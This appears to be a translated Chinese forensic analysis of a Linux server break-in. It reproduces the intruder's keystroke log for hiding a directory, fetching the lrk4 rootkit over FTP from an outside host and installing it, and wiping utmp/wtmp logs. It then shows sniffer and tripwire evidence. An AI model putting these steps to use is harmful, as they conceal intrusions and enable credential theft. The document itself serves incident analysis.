他們用來隱藏自已蹤跡的工具,一般情況下我們稱之為rootkits,一個常見的rootkits就是lrk4,通過執行它,有許多有用的程序將在一瞬間被替換以便使入侵者消失於無形。
在係統被入侵後的短短幾分鍾後,我們可以觀察到這個入侵者下載了一個rootkit,並且運行命令"makeinstall"完成了對它的安裝,下麵就是入侵者在隱藏自身時的一些擊鍵記錄。
cd/dev/
surewt
mkdir"."
cd"."
ftptechnotronic.com
anonymous
cd/unix/trojans
getlrk4.unshad.tar.gz
quit
ls
tar-zxvflrk4.unshad.tar.gz
mvlrk4proc
mvproc"."
cd"."
ls
makeinstall
注意到這個入侵者做了一件事,就是建立了一個隱藏目錄".",然後把rootkit放在這裏麵,這個目錄不會被"ls"命令列出來,而如果運行了"ls-la"命令的話,這個目錄看起來也象是該目錄自身。當然你可以通過運行"find"命令來找出它來(這必須建立在你的find沒有被rootkit取代的情況下)。
mozart#find/-depth-name"*.*"
/var/lib/news/.news.daily
/var/spool/at/.SEQ
/dev/././procps-1.01/proc/.depend
/dev/./.
/dev/
這個入侵者雖然看來對裝後門木馬有比較豐富的經驗,但對如何清除日誌文件中自己的入侵記錄卻沒啥主意,他並非利用一些清除日誌的工具如zap2或者clean來做這件事,而是直接拷貝了/dev/null(這是一個設備特殊文件,為空)到/var/run/utmp及/var/log/utmp,然後刪除了/var/log/wtmp,這樣,如果你發現這些文件為空,或者試圖打開它的時候,你會碰上錯誤提示:
[root@mozartsbin]#last-10
last:/var/log/wtmp:
Nosuchfileordirectory
Perhapsthisfilewasremovedbytheoperatortopreventlogginglastinfo.
下一步
現在你的係統看上去已經足夠好了,入侵者往下往往會做兩件事:第一,他們通過用你的機器來對網絡中其它主機係統進行漏洞掃描;第二,他們希望藏得更深,並且看看他們還能從這個係統中得到什麼,比如說其它用戶的帳號......咱們這位入侵者選擇了第二條,他在係統中安裝了一個嗅探器以捕獲相關的網絡流量,包括telnet以及ftp的一些信息--這樣他就可以獲得登陸的用戶名及密碼,我們在/var/log/messages裏看到係統在受攻擊後一小段時間,網卡被置於混雜模式,以接收各種數據包了。
Apr2717:03:38mozartkernel:eth0:Settingpromiscuousmode.
Apr2717:03:43mozartkernel:eth0:Settingpromiscuousmode.
當安裝木馬、清除日誌以及開啟嗅探器這些工作都完成後,入侵者離開了我們的係統,當然,一段時間後,他一定還會回來看看,嗅探器是否捕獲到了一些有用的信息。
事態控製
當我們的這位朋友離開係統後,我就有機會好好檢查一下係統究竟發生了什麼。我對咱們被改變的文件、日誌以及嗅探器得到的東西比較感興趣,首先我用tripwire來判斷哪些文件被修改或編輯的。你需通過確保可信的版本運行你的tripwire,我一般是用一個編譯成靜態的、存放於寫保護軟盤之上的的tripwire來判斷的,輸出如下:
added:-rw-r--r--root5Apr2717:01:161999/usr/sbin/sniff.pid
added:-rw-r--r--root272Apr2717:18:091999/usr/sbin/tcp.log
changed:-rws--x--xroot15588Jun105:49:221998/bin/login
changed:drwxr-xr-xroot20480Apr1014:44:371999/usr/bin
changed:-rwxr-xr-xroot52984Jun1004:49:221998/usr/bin/find
changed:-r-sr-sr-xroot126600Apr2711:29:181998/usr/bin/passwd